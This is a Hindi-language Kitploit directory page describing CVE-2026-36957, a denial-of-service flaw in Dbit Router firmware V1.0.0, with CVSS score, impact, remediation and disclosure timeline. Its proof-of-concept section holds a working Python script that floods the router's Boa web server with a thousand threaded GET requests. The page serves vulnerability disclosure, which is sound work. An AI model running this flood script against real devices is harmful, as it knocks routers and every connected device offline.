Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/kirubel-cve/cve-2026-36957
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

# CVE-2026-36957 के लिए प्रूफ-ऑफ-कॉन्सेप्ट Dbit Router फर्मवेयर में एक denial-of-service भेद्यता, जो Boa वेब सर्वर पर HTTP flood के माध्यम से संसाधनों की कमी और सिस्टम हैंग का कारण बनती है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-36957: Boa वेब सर्वर पर HTTP फ्लड के माध्यम से सेवा से वंचित (Denial of Service)

CVE ID: CVE-2026-36957 दिनांक: 2026-04-29 खोजकर्ता: Kirubel Solomne विक्रेता: Shenzhen Dibit Network Equipment Co., Ltd. उत्पाद: Dbit Router फर्मवेयर संस्करण: V1.0.0 CWE: CWE-400 - अनियंत्रित संसाधन खपत


विवरण

Dbit Router फर्मवेयर V1.0.0, Boa वेब सर्वर URI हैंडलर के माध्यम से सेवा से वंचित (Denial of Service) की भेद्यता से ग्रस्त है। गैर-मौजूद URI पर HTTP GET अनुरोधों की उच्च-मात्रा वाली बाढ़ भेजकर, एक हमलावर फ़ाइल डिस्क्रिप्टर और मेमोरी बफ़र सहित महत्वपूर्ण सिस्टम संसाधनों को समाप्त कर सकता है। इसके परिणामस्वरूप कर्नेल डेडलॉक या सिस्टम हैंग हो जाता है, जो वेब प्रबंधन पोर्टल और सभी रूटिंग क्षमताओं को अक्षम कर देता है।


CVSS स्कोर

CVSS v3.1 स्कोर: 7.5 (उच्च) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

मीट्रिकमान
हमला वेक्टरनेटवर्क
हमले की जटिलताकम
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
गोपनीयता प्रभावकोई नहीं
अखंडता प्रभावकोई नहीं
उपलब्धता प्रभावउच्च

प्रमाण की अवधारणा (Proof of Concept)

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

अपेक्षित व्यवहार: सर्वर को कनेक्शन सीमित करना चाहिए और स्थिर रहना चाहिए। वास्तविक व्यवहार: राउटर का वेब इंटरफ़ेस अनुत्तरदायी हो जाता है; मैन्युअल रीबूट की आवश्यकता होती है।


प्रभाव

  • वेब प्रबंधन इंटरफ़ेस का पूर्ण नुकसान
  • सभी रूटिंग क्षमताओं में व्यवधान
  • सेवा बहाल करने के लिए मैन्युअल रीबूट की आवश्यकता
  • सभी कनेक्टेड डिवाइसों के लिए नेटवर्क डाउनटाइम

उपचार (Remediation)

  • Boa वेब सर्वर पर कनेक्शन दर सीमित करना (rate limiting) लागू करें
  • डेडलॉक स्थितियों से उबरने के लिए वॉचडॉग टाइमर जोड़ें
  • प्रति IP अधिकतम समवर्ती कनेक्शन सीमित करें

प्रकटीकरण समयरेखा

दिनांकघटना
2026-04-29भेद्यता की खोज की गई
2026-04-29MITRE को रिपोर्ट किया गया
2026-04-29CVE-2026-36957 आवंटित किया गया
2026-04-29सार्वजनिक प्रकटीकरण

संदर्भ

  • MITRE CVE-2026-36957
  • CWE-400
  • विक्रेता वेबसाइट
टूल डाउनलोड करें